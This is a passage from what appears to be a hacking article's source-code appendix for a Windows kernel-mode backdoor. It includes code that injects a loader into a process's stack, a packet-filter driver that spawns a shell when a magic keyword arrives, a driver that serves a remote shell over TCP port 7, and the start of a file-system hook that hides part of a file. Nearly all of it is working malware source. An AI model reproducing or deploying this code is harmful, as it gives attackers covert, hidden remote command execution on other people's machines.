+> void redir2pipe(HANDLE hProcess, wchar_t *PipeName/*, wchar_t *WPipeName*/, PVOID EntryPoint, PVOID pStack, /*OUT PULONG pData,*/ OUT PULONG pCode, OUT PULONG pNewStack)
+> {
+>         s_data2embed data2embed;
+>         PVOID pKERNEL32;
+>         NT::UNICODE_STRING ModuleFileName;
+>         
+>         _asm int 3;
+>
+>         *pCode = 0;
+>         *pNewStack = 0;
+>         NT::RtlInitUnicodeString(&ModuleFileName, L"kernel32.dll");
+>         LdrGetDllHandle(NULL, NULL, &ModuleFileName, &pKERNEL32);
+>         if (!pKERNEL32) return;
+>         data2embed.pSetStdHandle=(f_SetStdHandle)FindFunc(pKERNEL32, "SetStdHandle");
+>         data2embed.pCreateFileW=(f_CreateFileW)FindFunc(pKERNEL32, "CreateFileW");
+> #ifdef _DEBUG
+>         data2embed.pGetLastError=(f_GetLastError)FindFunc(pKERNEL32, "GetLastError");
+> #endif
+>         if ((!data2embed.pSetStdHandle)||(!data2embed.pCreateFileW)) return;
+>         data2embed.EntryPoint=(f_EntryPoint)EntryPoint;
+>         wcscpy(data2embed.PipeName, PipeName);
+>         //wcscpy(data2embed.WPipeName, WPipeName);
+>         char* p = (char*)pStack - sizeof_code2embed;
+>         if (ZwWriteVirtualMemory(hProcess, p, &code2embed, sizeof_code2embed, 0)) return;
+>         *pCode = (ULONG)p;
+>         
+>         p -= sizeof s_data2embed;
+>         if (ZwWriteVirtualMemory(hProcess, p, &data2embed, sizeof s_data2embed, 0)) return;
+>         
+>         PVOID pData = (PVOID)p;
+>         p -= sizeof pData;
+>         if (ZwWriteVirtualMemory(hProcess, p, &pData, sizeof pData, 0)) return;
+>         
+>         p -= 4;
+>         *pNewStack = (ULONG)p;
+> }
+>
+317a434,437
+>         ULONG newEIP, NewStack;
+>         redir2pipe(hProcess, PipeName->Buffer, sii.EntryPoint, stack.ExpandableStackBase, &newEIP, &NewStack);
+>         if ((!NewStack)||(!newEIP)) return 0;
+>
+326,327c446,449
+<     context.Esp = ULONG(stack.ExpandableStackBase) - 4;
+<     context.Eip = ULONG(sii.EntryPoint);
+---
+>         //loader code is on the stack
+>         context.Esp = NewStack;
+>     context.Eip = newEIP;
+
+
+----[ 8.6 - NtdllDynamicLoader.cpp
+
+#include <ntdll.h>
+//#include "UndocKernel.h"
+#include "DynLoadFromNtdll.h"
+
+//Example A.2 from Nebbet's book
+
+//Search loaded module by name
+PVOID FindModule(char *module)
+{
+        ULONG n;
+        //Request necessary size of buffer
+        NT::ZwQuerySystemInformation(NT::SystemModuleInformation,
+                                 &n, 0, &n);
+        //Allocate memory for n structures
+    PULONG q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
+        //Request information about modules
+    NT::ZwQuerySystemInformation(NT::SystemModuleInformation,
+                                 q, n * sizeof *q, 0);
+
+        //Module counter located at address q, information begins at q+1
+    NT::PSYSTEM_MODULE_INFORMATION p
+        = NT::PSYSTEM_MODULE_INFORMATION(q + 1);
+    PVOID ntdll = 0;
+
+        //Cycle for each module ...
+        for (ULONG i = 0; i < *q; i++)
+        {
+                //...compare it's name with looked for...
+                if (_stricmp(p[i].ImageName + p[i].ModuleNameOffset,
+                     module) == 0)
+                {
+                        //...and stop if module found
+                        ntdll = p[i].Base;
+                        break;
+                }
+        }
+        //Free memory
+    NT::ExFreePool(q);
+    return ntdll;
+}
+
+PVOID FindNT()
+{
+    return FindModule("ntdll.dll");
+}
+
+//Search exported function named Name in module, loaded at addrress Base
+PVOID FindFunc(PVOID Base, PCSTR Name)
+{
+        //At addrress Base there is DOS EXE header
+        PIMAGE_DOS_HEADER dos = PIMAGE_DOS_HEADER(Base);
+        //Extract offset of PE-header from it
+    PIMAGE_NT_HEADERS nt = PIMAGE_NT_HEADERS(PCHAR(Base) + dos->e_lfanew);
+        //Evaluate pointer to section table,
+        //according to directory of exported functions
+    PIMAGE_DATA_DIRECTORY expdir
+        = nt->OptionalHeader.DataDirectory + IMAGE_DIRECTORY_ENTRY_EXPORT;
+        //Extract address and size of that table
+    ULONG size = expdir->Size;
+    ULONG addr = expdir->VirtualAddress;
+
+        //Evaluate pointers:
+        // - to directory of exported functions
+    PIMAGE_EXPORT_DIRECTORY exports
+        = PIMAGE_EXPORT_DIRECTORY(PCHAR(Base) + addr);
+        // - to table of addresses
+    PULONG functions = PULONG(PCHAR(Base) + exports->AddressOfFunctions);
+        // - to table of ordinals
+    PSHORT ordinals  = PSHORT(PCHAR(Base) + exports->AddressOfNameOrdinals);
+        // - to table of names
+    PULONG names     = PULONG(PCHAR(Base) + exports->AddressOfNames);
+
+    //Cycle through table of names ...
+        for (ULONG i = 0; i < exports->NumberOfNames; i++) {
+                //Ordinal that matches name is index in the table of addresses
+        ULONG ord = ordinals[i];
+                //Test is the address correct
+        if (functions[ord] < addr  ||  functions[ord] >= addr + size) {
+                        //If function name matches looked for...
+            if (strcmp(PSTR(PCHAR(Base) + names[i]), Name) == 0)
+                                //then return it's address
+                return PCHAR(Base) + functions[ord];
+        }
+    }
+        //Function not found
+    return 0;
+}
+
+
+----[ 8.7 - Filtering.cpp
+
+extern "C" {
+#include <ntddk.h>
+#include <ntddndis.h>
+#include <pfhook.h>
+#include "filtering.h"
+#include "Sniffer.h"
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+ZwLoadDriver(
+    IN PUNICODE_STRING DriverServiceName
+    );
+}
+
+
+extern PF_FORWARD_ACTION PacketFilter(
+  IN IPHeader *PacketHeader,
+  IN unsigned char *Packet,
+  IN unsigned int PacketLength,
+  IN unsigned int RecvInterfaceIndex,
+  IN unsigned int SendInterfaceIndex,
+  IN IPAddr RecvLinkNextHop,
+  IN IPAddr SendLinkNextHop
+  );
+
+NTSTATUS globalresult;
+PDEVICE_OBJECT  pDeviceObject;
+PFILE_OBJECT  pFileObject;
+KEVENT Event;
+        
+NTSTATUS SutdownFiltering()
+{
+        if ((pDeviceObject)&&(pFileObject))
+        {
+                globalresult=SetupFiltering(NULL);
+                ObDereferenceObject(pFileObject);
+                return globalresult;
+        }
+        else return STATUS_SUCCESS;
+}
+
+
+NTSTATUS InitFiltering()
+{
+        UNICODE_STRING FiltDrvName;
+        UNICODE_STRING DSN={0};
+        //_asm int 3;
+        RtlInitUnicodeString(&FiltDrvName,L"\\Device\\IPFILTERDRIVER");
+        pDeviceObject=NULL;
+retry:
+        IoGetDeviceObjectPointer(&FiltDrvName,SYNCHRONIZE|GENERIC_READ|GENERIC_WRITE,&pFileObject,&pDeviceObject);
+        if ((!pDeviceObject)&&(!DSN.Length))
+        {
+                RtlInitUnicodeString(&DSN,L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\IpFilterDriver");
+                ZwLoadDriver(&DSN);
+                goto retry;
+        }
+        if (pDeviceObject)
+        {
+                KeInitializeEvent(&Event,NotificationEvent,FALSE);
+                return SetupFiltering(&PacketFilter);
+        } else return STATUS_OBJECT_NAME_NOT_FOUND;
+}
+
+NTSTATUS SetupFiltering(void *PacketFilterProc)
+{
+        IO_STATUS_BLOCK iostb;
+        LARGE_INTEGER Timeout;
+        PIRP pirp = NULL;
+        //_asm int 3;
+        pirp = IoBuildDeviceIoControlRequest(IOCTL_PF_SET_EXTENSION_POINTER,pDeviceObject,(PPF_SET_EXTENSION_HOOK_INFO)&PacketFilterProc,sizeof(PF_SET_EXTENSION_HOOK_INFO),NULL,0,FALSE,&Event,&iostb);
+        if (!pirp)
+        {
+                return STATUS_UNSUCCESSFUL;
+        }
+        globalresult=IoCallDriver(pDeviceObject,pirp);
+        if (globalresult == STATUS_PENDING)
+        {
+                Timeout.QuadPart=100000000;
+                if (KeWaitForSingleObject(&Event,Executive,KernelMode,FALSE,&Timeout)!=STATUS_SUCCESS)
+                        return STATUS_UNSUCCESSFUL;
+                globalresult = pirp->IoStatus.Status;
+        }        
+        return globalresult;
+}
+
+
+----[ 8.8 - MPFD_main.cpp
+
+extern "C" {
+#include <ntddk.h>
+#include <ntddndis.h>
+#include <pfhook.h>
+#include "Sniffer.h"
+#include "Filtering.h"
+}
+
+extern VOID ShellStarter(VOID* StartShellEvent);
+HANDLE hShellStarterTread=NULL;
+BOOLEAN Terminating=FALSE;
+KEVENT StartShellEvent;
+
+unsigned char * __cdecl memfind(
+        const unsigned char * str1,
+                unsigned int n1,
+        const unsigned char * str2,
+                unsigned int n2
+        )
+{
+                if (n2>n1) return NULL;
+
+        unsigned char *cp = (unsigned char *) str1;
+        unsigned char *s1, *s2;
+                unsigned int x;
+
+        for (unsigned int i=0;i<=n1-n2;i++)
+        {
+                s1 = cp;
+                s2 = (unsigned char *) str2;
+                                x=n2;
+
+                while (x && !(*s1-*s2) )
+                        s1++, s2++, x--;
+                                if (!x) return(cp);
+                cp++;
+        }
+        return(NULL);
+}
+
+unsigned char keyword[]="\x92\x98\xC7\x68\x9F\xF9\x42\xA9\xB2\xD8\x38\x5C\x8C\x31\xE1\xD6";
+
+PF_FORWARD_ACTION PacketFilter(
+  IN IPHeader *PacketHeader,
+  IN unsigned char *Packet,
+  IN unsigned int PacketLength,
+  IN unsigned int RecvInterfaceIndex,
+  IN unsigned int SendInterfaceIndex,
+  IN IPAddr RecvLinkNextHop,
+  IN IPAddr SendLinkNextHop
+  )
+{
+        if (memfind(Packet,PacketLength,keyword,sizeof(keyword)))
+        {
+                HANDLE ThreadHandle;
+                KeSetEvent(&StartShellEvent, 0, FALSE);                
+        }
+        return PF_PASS;
+}
+
+NTSTATUS
+OnStubDispatch(
+    IN PDEVICE_OBJECT DeviceObject,
+    IN PIRP           Irp
+    )
+{
+    Irp->IoStatus.Status      = STATUS_SUCCESS;
+    IoCompleteRequest (Irp,
+                       IO_NO_INCREMENT
+                       );
+    return Irp->IoStatus.Status;
+}
+
+VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
+{
+#if (DBG)
+        DbgPrint("MPFD: OnUnload called\n");
+#endif
+        PVOID ThreadObj;
+        SutdownFiltering();
+        if (hShellStarterTread)
+        {
+                Terminating=TRUE;
+                ObReferenceObjectByHandle(hShellStarterTread, THREAD_ALL_ACCESS, NULL, KernelMode, &ThreadObj, NULL);
+                KeSetEvent(&StartShellEvent, 0, TRUE);
+                KeWaitForSingleObject(ThreadObj, Executive, KernelMode, FALSE, NULL);        
+        }
+}
+
+#pragma code_seg("INIT")
+
+NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
+{
+        NTSTATUS status;
+
+#if (DBG)
+        DbgPrint("MPFD:In DriverEntry\n");
+#endif
+        UNREFERENCED_PARAMETER(RegistryPath);
+
+        for (int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
+        {
+                DriverObject->MajorFunction[i] = OnStubDispatch;
+           }
+        DriverObject->DriverUnload  = OnUnload;
+        
+        status=InitFiltering();
+        if (status!=STATUS_SUCCESS) return status;
+        KeInitializeEvent(&StartShellEvent,SynchronizationEvent,FALSE);
+        OBJECT_ATTRIBUTES attr={sizeof(OBJECT_ATTRIBUTES), 0,NULL, OBJ_CASE_INSENSITIVE};
+        status=PsCreateSystemThread(&hShellStarterTread, THREAD_ALL_ACCESS, &attr, 0, NULL, ShellStarter, &StartShellEvent);
+        
+        return status;
+}
+
+
+----[ 8.9 - NtBackd00r.cpp
+
+// NtBackd00r.cpp
+//
+// Generated by Driver::Wizard version 2.0
+
+#define VDW_MAIN
+#include <vdw.h>
+#include <stdio.h>
+#include <ntifs.h>
+#include "function.h"
+#include "NtBackd00r.h"
+#pragma hdrstop("NtBackd00r.pch")
+
+#if (DBG)
+#define dprintf DbgPrint
+#else
+#define dprintf
+#endif
+
+extern "C" {
+        NTSYSAPI
+                NTSTATUS
+                NTAPI
+                ZwWaitForMultipleObjects(
+                IN ULONG HandleCount,
+                IN PHANDLE Handles,
+                IN WAIT_TYPE WaitType,
+                IN BOOLEAN Alertable,
+                IN PLARGE_INTEGER Timeout OPTIONAL
+                );
+        
+        NTSYSAPI
+                NTSTATUS
+                NTAPI
+                ZwCreateEvent(
+                OUT PHANDLE EventHandle,
+                IN ACCESS_MASK DesiredAccess,
+                IN POBJECT_ATTRIBUTES ObjectAttributes,
+                IN EVENT_TYPE EventType,
+                IN BOOLEAN InitialState
+                );
+        
+        NTSYSAPI
+                NTSTATUS
+                NTAPI
+                ZwSetEvent(
+                IN HANDLE EventHandle,
+                OUT PULONG PreviousState OPTIONAL
+                );
+}
+
+extern "C" void LoadFuncs();
+extern "C" HANDLE StartShell(PHANDLE phPipe);
+extern VOID ShellStarter(VOID* StartShellEvent);
+
+/////////////////////////////////////////////////////////////////////
+// Begin INIT section
+#pragma code_seg("INIT")
+
+DECLARE_DRIVER_CLASS(NtBackd00r, NULL)
+
+/////////////////////////////////////////////////////////////////////
+// Driver Entry
+//
+NTSTATUS NtBackd00r::DriverEntry(PUNICODE_STRING RegistryPath)
+{
+        UNREFERENCED_PARAMETER(RegistryPath);
+        
+        //Dynamic import of functions exported from ntdll.dll
+        LoadFuncs();
+        
+        // Initialize the TDIClient framework first
+        if (!KTDInterface::Initialize())
+        {
+                // something wrong with TDI
+                return STATUS_NOT_FOUND;
+        }
+        
+        // Create TCP server, port 7
+        CIPTRANSPORT_ADDRESS TCP_port(IPPORT_ECHO);
+        m_pListener = new(NonPagedPool) KStreamServer<Session> (TCP_port);
+        
+        // If succeeded - enable network events
+        
+    if (m_pListener && m_pListener->IsCreated()) {
+        m_pListener->SetEvents(TRUE);
+        dprintf("NtBackd00rDevice: Listener started\n");
+    }
+    else {
+        dprintf("NtBackd00rDevice: Failed to start (port conflict?)\n");
+        return STATUS_INSUFFICIENT_RESOURCES;
+    }
+        
+        //Create dummy device for IoQueueWorkItem
+        m_pDummyDevice = new(NonPagedPool) DummyDevice(NULL, FILE_DEVICE_UNKNOWN, NULL);
+        
+        if (m_pDummyDevice  == NULL)
+        {
+                return STATUS_INSUFFICIENT_RESOURCES;
+        }
+        
+        return STATUS_SUCCESS;
+}
+
+
+#pragma code_seg()
+#pragma warning( disable : 4706 )
+
+//This message will be sen to client in case of failure when starting shell
+char errtxt_shell[]="cant start shell";
+
+//////////////////////////////////////////////////////////////////////////////
+//        Unload is responsible for releasing any system objects that
+//        the driver has allocated.
+//
+VOID NtBackd00r::Unload(VOID)
+{
+        
+    if (m_pListener)
+        {
+                // Disable network event notifications
+                m_pListener->SetEvents(FALSE);
+                
+                // Iterate through the list of active sessions
+                // and forcefully disconnect all active sessions
+                Session* p;
+                TDI_STATUS Status;
+                
+                while ( p = m_ActiveSessionList.RemoveHead() )
+                {
+                        // Thread handle must be extracted before dele p
+                        HANDLE hWorkerThread = p->hDataPumpThread;
+                        // By default, this method will perform an
+                        // abortive disconnect (RST)
+                        Status = p->disconnect();
+                        ASSERT(TDI_PENDING == Status || TDI_SUCCESS == Status);
+                        delete p;
+                        // It's required to wait for termination of worker threads,
+                        // or else unloading driver will cause BSOD
+                        if (hWorkerThread) ZwWaitForSingleObject(hWorkerThread, FALSE, NULL);
+                }
+                
+                // Wait for all outstanding requests to complete
+                // By issuing a disconnect for all sessions, any
+                // pending requests should be completed by the transport
+                m_pListener->Wait();
+                
+                // destroy the socket
+                delete m_pListener;
+                m_pListener = NULL;
+                
+                dprintf("NtBackd00rDevice: Listener stopped\n");
+        }
+        
+        delete m_pDummyDevice;
+        
+        // Call base class destructor to delete all devices.
+        KDriver::Unload();
+}
+
+// Frees buffers, given to ZwWriteFile for asynchronous write
+VOID NTAPI ApcCallbackWriteComplete(
+                                                                        IN PVOID ApcContext,
+                                                                        IN PIO_STATUS_BLOCK IoStatusBlock,
+                                                                        IN ULONG Reserved
+                                                                        )
+{
+        UNREFERENCED_PARAMETER(IoStatusBlock);
+        UNREFERENCED_PARAMETER(Reserved);
+        
+        //
+        delete (uchar *)ApcContext;
+}
+
+#define SENDS_QUEUED_THRESHOLD 3
+
+// Thread, that transfers data between named pipe and socket
+VOID DataPumpThread(IN PVOID thiz1)
+{
+        IO_STATUS_BLOCK send_iosb, rcv_iosb;
+        uchar *send_buf, *rcv_buf;
+        ULONG rd;
+        const bufsize=0x1000;
+        NTSTATUS status;
+        LARGE_INTEGER  ResendInterval;
+        //loacl copy of Pipes needed for correct thread termination
+        //after deleting Session
+        s_Pipes *Pipes;  
+
+        
+        Session* thiz=(Session*)thiz1;
+        Pipes=thiz->m_Pipes;
+        ResendInterval.QuadPart = (__int64)1E6; //0.1c
+        
+        //Create FIFO
+        //Source of BSOD at high IRQL
+        thiz->pWBytePipe = new(NonPagedPool) KLockableFifo<UCHAR>(0x100000, NonPagedPool);
+        //Lock socket to avoid sudden deletion of it
+        thiz->Lock();
+        
+        //send_buf alocated here, deleted in OnSendComplete
+        send_buf = new(NonPagedPool) uchar[bufsize];        
+        //Start asynchronous read
+        status=ZwReadFile(Pipes->hPipe, Pipes->hPipeEvents[1], NULL, NULL, &send_iosb, send_buf, bufsize, NULL, NULL);
+        if (status==STATUS_SUCCESS)
+        {
+                //Send read data to client
+                status=thiz->send(send_buf, send_iosb.Information, send_buf);
+                if ((status!=STATUS_PENDING)&&(status!=STATUS_SUCCESS))
+                        dprintf("send error %08x\n");
+                //to avoid recurring send of same data
+                send_iosb.Status = -1;
+        }
+        while (1) switch (ZwWaitForMultipleObjects(2, &Pipes->hPipeEvents[0], WaitAny, TRUE, NULL))
+        {
+                //STATUS_WAIT_1 - read operation completed
+        case STATUS_WAIT_1:
+                //
+                if (Pipes->Terminating) goto fin;
+                if (!Pipes->hPipe) break;
+sending:
+                {
+                        if (!send_iosb.Status)
+                        {
+resend:
+                        //Send read data to client
+                        status=thiz->send(send_buf, send_iosb.Information, send_buf);
+                        //If there wan an error, then it tried to push too much data in socket
+                        if ((status!=STATUS_SUCCESS)&&(status!=STATUS_PENDING))
+                        {
+                                //Wait for free space in buffer...
+                                KeDelayExecutionThread(KernelMode, TRUE, &ResendInterval);
+                                //...and retry
+                                goto resend;
+                        }
+                        }
+                        //send_buf alocated here, deleted in OnSendComplete
+                        send_buf = new(NonPagedPool) uchar[bufsize];        
+                        //Start asynchronous read
+                        status=ZwReadFile(Pipes->hPipe, Pipes->hPipeEvents[1], NULL, NULL, &send_iosb, send_buf, bufsize, NULL, NULL);
+                        //If there was a data in pipe buffer, it read instantly.
+                        if (status==STATUS_SUCCESS)
+                                //send it immediately
+                                goto sending;
+                        else {
+                                if (status!=STATUS_PENDING)
+                                {
+                                        delete send_buf;
+                                        //STATUS_PIPE_LISTENING - it's OK, process not connected to pipe yet
+                                        if (status!=STATUS_PIPE_LISTENING)
+                                        {
+                                                //otherwise it was an error, disconnect client and terminate thread
+                                                if (!Pipes->Terminating) thiz->disconnect();
+                                                goto fin;
+                                        }
+                                }
+                        }
+                };
+                break;
+                //STATUS_WAIT_0 - write operation completed
+        case STATUS_WAIT_0:
+                if (Pipes->Terminating) goto fin;
+                if (!Pipes->hPipe) break;
+                //FIFO must be locked during all operation with it
+                //to avoid conflicts
+                thiz->pWBytePipe->Lock();
+                //At first look what crowd into FIFO,...
+                rd = thiz->pWBytePipe->NumberOfItemsAvailableForRead();
+                if (rd)
+                {
+                        //... then allocate appropriate amount of memory ...
+                        rcv_buf = new(NonPagedPool) uchar[rd];
+                        //... and read all at once
+                        rd = thiz->pWBytePipe->Read(rcv_buf, rd);
+                }
+                thiz->pWBytePipe->Unlock();
+                if (rd)
+                {
+                        status = ZwWriteFile(Pipes->hPipe, NULL, ApcCallbackWriteComplete, rcv_buf, &rcv_iosb, rcv_buf, rd, NULL, NULL);
+                        if ((status!=STATUS_SUCCESS)&&(status!=STATUS_PIPE_LISTENING)&&(status!=STATUS_PENDING))
+                        {
+                                //if there was an error, disconnect client and terminate thread
+                                if (!Pipes->Terminating) thiz->disconnect();
+                                goto fin;
+                        }
+                }
+                break;
+        case STATUS_ALERTED:
+                break;
+        default: goto fin;
+        }
+fin:
+        //If termination not initiated from outside, unlock socket
+        if (!Pipes->Terminating) thiz->Unlock();
+        //If pipe exists, then all the rest exists too -
+        //destroy it all
+        if (Pipes->hPipe)
+        {
+                ZwClose(Pipes->hPipe);
+                for (int i=0;i<=1;i++)
+                        ZwClose(Pipes->hPipeEvents[i]);
+                CLIENT_ID clid = {Pipes->ChildPID, 0};
+                HANDLE hProcess;
+                OBJECT_ATTRIBUTES attr={sizeof(OBJECT_ATTRIBUTES), 0, NULL, 0};
+#define PROCESS_TERMINATE         (0x0001)  
+                status = ZwOpenProcess(&hProcess, PROCESS_TERMINATE, &attr, &clid);
+                if (!status)
+                {
+                        ZwTerminateProcess(hProcess, 0);
+                        ZwClose(hProcess);
+                }
+        }
+        delete Pipes;
+        PsTerminateSystemThread(0);
+}
+
+
+#define DISABLE_INTS __asm pushfd; cli
+#define RESTORE_INTS __asm popfd;
+
+VOID ShellStarter(IN PDEVICE_OBJECT DeviceObject, IN PVOID desc1)
+{
+        OBJECT_ATTRIBUTES        attr;
+        HANDLE                                loc_hPipe, loc_hPipeEvents[2], loc_ChildPID;
+        
+        UNREFERENCED_PARAMETER(DeviceObject);
+        
+#define desc ((s_WorkItemDesc*)desc1)
+        //By course of business will check is there "cancel" command
+        if (desc->WorkItemCanceled) goto cancel2;
+        
+        //Start shell
+        loc_ChildPID = StartShell(&loc_hPipe);
+        if (loc_ChildPID)
+        {
+                InitializeObjectAttributes(&attr, NULL, 0, NULL, NULL);                
+                
+                //Create 2 events to notify thread about data receipt
+                //from socket or pipe
+                for (int i=0;i<=1;i++)
+                        ZwCreateEvent(&loc_hPipeEvents[i], EVENT_ALL_ACCESS, &attr, SynchronizationEvent, FALSE);
+                
+                //Disable interrupts and write all handles to structure that is class member
+                DISABLE_INTS
+                        if (!desc->WorkItemCanceled)
+                        {
+                                desc->thiz->m_Pipes->hPipe = loc_hPipe;
+                                desc->thiz->m_Pipes->hPipeEvents[0] = loc_hPipeEvents[0];
+                                desc->thiz->m_Pipes->hPipeEvents[1] = loc_hPipeEvents[1];
+                                desc->thiz->m_Pipes->ChildPID = loc_ChildPID;
+                        }
+                RESTORE_INTS
+
+                if (desc->WorkItemCanceled) goto cancel;
+
+                //Create thread, that transfers data between named pipe and socket
+                PsCreateSystemThread(&desc->thiz->hDataPumpThread, THREAD_ALL_ACCESS, NULL, 0, NULL, DataPumpThread, desc->thiz);
+        } else {
+cancel:
+        //In case of error or cancel close pipe, send error message to client,
+        //and disconnect it
+        ZwClose(loc_hPipe);
+        char* errmess = new(NonPagedPool) char[sizeof(errtxt_shell)-1];
+        RtlCopyMemory(errmess, errtxt_shell, sizeof(errtxt_shell)-1);
+        desc->thiz->send(errmess, sizeof(errtxt_shell)-1);
+        desc->thiz->disconnect();
+        }
+cancel2:
+        //Cleanup
+        IoFreeWorkItem(desc->WorkItem);        
+        DISABLE_INTS
+        desc->WorkItem = NULL;
+        if (!desc->WorkItemCanceled) desc->thiz->m_WorkItemDesc = NULL;
+        RESTORE_INTS
+        ExFreePool(desc1);
+#undef desc
+}
+
+/////////////////////////////////////////////////////////////////////////
+// Session   -- Event handlers.
+BOOLEAN  Session::OnConnect(uint AddressLength, PTRANSPORT_ADDRESS pTA,
+                                                        uint OptionsLength, PVOID Options)
+{
+        // Connecting: print the IP address of the requestor and grant the connection
+#if(DBG)
+        char szIPaddr[20];        
+        inet_ntoa(PTDI_ADDRESS_IP(pTA->Address[0].Address)->in_addr, szIPaddr, sizeof(szIPaddr));
+        
+    dprintf("NtBackd00rDevice: Connecting client, IP addr = %s, session %8X\n", szIPaddr, this);
+#endif
+        // obtain a pointer to the KDriver derived class
+        NtBackd00r* p = reinterpret_cast<NtBackd00r*>(KDriver::DriverInstance());
+        ASSERT(p);
+        
+        //Initialization of miscellaneous stuff
+        pWBytePipe = NULL;
+        hDataPumpThread = NULL;        
+        m_Pipes = new(NonPagedPool) s_Pipes;
+        RtlZeroMemory(m_Pipes, sizeof s_Pipes);
+
+        //Initialize and start WorkItem
+        m_WorkItemDesc = ExAllocatePool(NonPagedPool, sizeof s_WorkItemDesc);
+#define pWorkItemDesc ((s_WorkItemDesc*)m_WorkItemDesc)
+        pWorkItemDesc->WorkItemCanceled=false;
+        pWorkItemDesc->thiz=this;
+        pWorkItemDesc->WorkItem=IoAllocateWorkItem(*p->m_pDummyDevice);
+        if (!pWorkItemDesc->WorkItem) return FALSE;
+        //To make this work on NT4 replace IoQueueWorkItem with ExQueueWorkItem
+        IoQueueWorkItem(pWorkItemDesc->WorkItem, &ShellStarter, CriticalWorkQueue, pWorkItemDesc);
+#undef pWorkItemDesc        
+
+        // Add this object to the session list maintained by the driver
+        p->m_ActiveSessionList.InsertTail(this);
+        
+        UNREFERENCED_PARAMETERS4(AddressLength, pTA, OptionsLength, Options);
+    return TRUE;
+}
+
+void Session::OnDisconnect(uint OptionsLength, PVOID Options, BOOLEAN bAbort)
+{
+        
+    dprintf("NtBackd00rDevice: Disconnecting client, session %8X\n", this);
+        
+        UNREFERENCED_PARAMETERS3(OptionsLength, Options,bAbort);
+}
+
+Session::~Session()
+{
+        // obtain a pointer to the KDriver derived class
+        NtBackd00r* p = reinterpret_cast<NtBackd00r*>(KDriver::DriverInstance());
+        ASSERT(p);
+        // Remove this object from the session list maintained by the driver
+        p->m_ActiveSessionList.Remove(this);
+        
+        //Set flas, that make thread to terminate
+        m_Pipes->Terminating = true;
+        //To not wait for yesterday in OnUnload
+        hDataPumpThread = NULL;
+        //Set event "let's finish"
+        if ( m_Pipes && (m_Pipes->hPipeEvents[0])) ZwSetEvent(m_Pipes->hPipeEvents[0], NULL);
+        
+        //If WorkItem works, notify it about termination
+        if (m_WorkItemDesc) ((s_WorkItemDesc*)m_WorkItemDesc)->WorkItemCanceled=true;
+        
+        delete pWBytePipe;
+}
+
+uint Session::OnReceive(uint Indicated, uchar *Data, uint Available,
+                                                uchar **RcvBuffer, uint* RcvBufferLen)
+{
+        // Received some data from the client peer.
+        
+        //If all required pointers and handles are valid
+        if (m_Pipes && pWBytePipe && m_Pipes->hPipe)
+        {
+                //Write that data to FIFO
+                pWBytePipe->LockedWrite(Data, Indicated);
+                //And notify DataPumpThread
+                ZwSetEvent(m_Pipes->hPipeEvents[0], NULL);
+        }
+        
+
+        // Now, if the transport has more data available than indicated,
+        // allocate another buffer to read the rest. When the transport
+        // done with it - asynchronously - our OnReceiveComplete() handler
+        // is called. Note that failure to submit a buffer supressed further
+        // recieve indications - until and if a recv() is issued.
+        
+        if (Indicated < Available) {
+                *RcvBuffer = new(NonPagedPool) uchar [*RcvBufferLen = Available-Indicated];
+        }
+        
+    return Indicated;
+}
+
+void Session::OnSendComplete(PVOID buf, TDI_STATUS status, uint bytecnt)
+{
+    // Our send request has completed. Free the buffer
+        
+        if (status != TDI_SUCCESS)
+        dprintf("NtBackd00rDevice: Failed sending data, err %X\n", status);
+        //free the buffer
+        delete ((uchar*)buf);
+        
+        UNREFERENCED_PARAMETER(bytecnt);
+}
+
+void Session::OnReceiveComplete(TDI_STATUS status, uint Indicated, uchar *Data)
+{
+        // Buffer for the partially indicated data allocated and submitted during
+        // OnReceive() processing is filled in by the transport.
+        
+    if (status == TDI_SUCCESS) {
+                if (m_Pipes && pWBytePipe && m_Pipes->hPipe)
+                {
+                        //Write that data to FIFO
+                        pWBytePipe->LockedWrite(Data, Indicated);
+                        //And notify DataPumpThread
+                        ZwSetEvent(m_Pipes->hPipeEvents[0], NULL);
+                }
+        } else
+        dprintf("NtBackd00rDevice: Failed completing receive, err %X\n", status);
+        
+        if (status != TDI_PENDING)
+                delete Data;
+}
+
+// end of file
+
+
+---[ 8.10 - Intercept.cpp
+
+//This module hooks:
+// IRP_MJ_READ, IRP_MJ_WRITE, IRP_MJ_QUERY_INFORMATION,
+// IRP_MJ_SET_INFORMATION, IRP_MJ_DIRECTORY_CONTROL,
+// FASTIO_QUERY_STANDARD_INFO FASTIO_QUERY_BASIC_INFO FASTIO_READ(WRITE)
+//to hide first N bytes of given file
+
+extern "C" {
+#include <ntddk.h>
+}
+#pragma hdrstop("InterceptIO.pch")
+
+/////////////////////////////////////////////////////////////////////
+// Undocumented structures missing in ntddk.h
+
+typedef struct _FILE_INTERNAL_INFORMATION { // Information Class 6
+    LARGE_INTEGER FileId;
+} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;
+
+typedef struct _FILE_EA_INFORMATION { // Information Class 7
+    ULONG EaInformationLength;
+} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;
+
+typedef struct _FILE_ACCESS_INFORMATION { // Information Class 8
+    ACCESS_MASK GrantedAccess;
+} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;
+
+typedef struct _FILE_MODE_INFORMATION { // Information Class 16
+    ULONG Mode;
+} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;
+
+typedef struct _FILE_ALLOCATION_INFORMATION { // Information Class 19
+    LARGE_INTEGER AllocationSize;
+} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;
+
+typedef struct _FILE_DIRECTORY_INFORMATION {
+        ULONG NextEntryOffset;
+        ULONG FileIndex;
+        LARGE_INTEGER CreationTime;
+        LARGE_INTEGER LastAccessTime;
+        LARGE_INTEGER LastWriteTime;
+        LARGE_INTEGER ChangeTime;
+        LARGE_INTEGER EndOfFile;
+        LARGE_INTEGER AllocationSize;
+        ULONG FileAttributes;
+        ULONG FileNameLength;
+        WCHAR FileName[1];
+} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
+
+typedef struct _FILE_ALL_INFORMATION { // Information Class 18
+    FILE_BASIC_INFORMATION BasicInformation;
+    FILE_STANDARD_INFORMATION StandardInformation;
+    FILE_INTERNAL_INFORMATION InternalInformation;
+    FILE_EA_INFORMATION EaInformation;
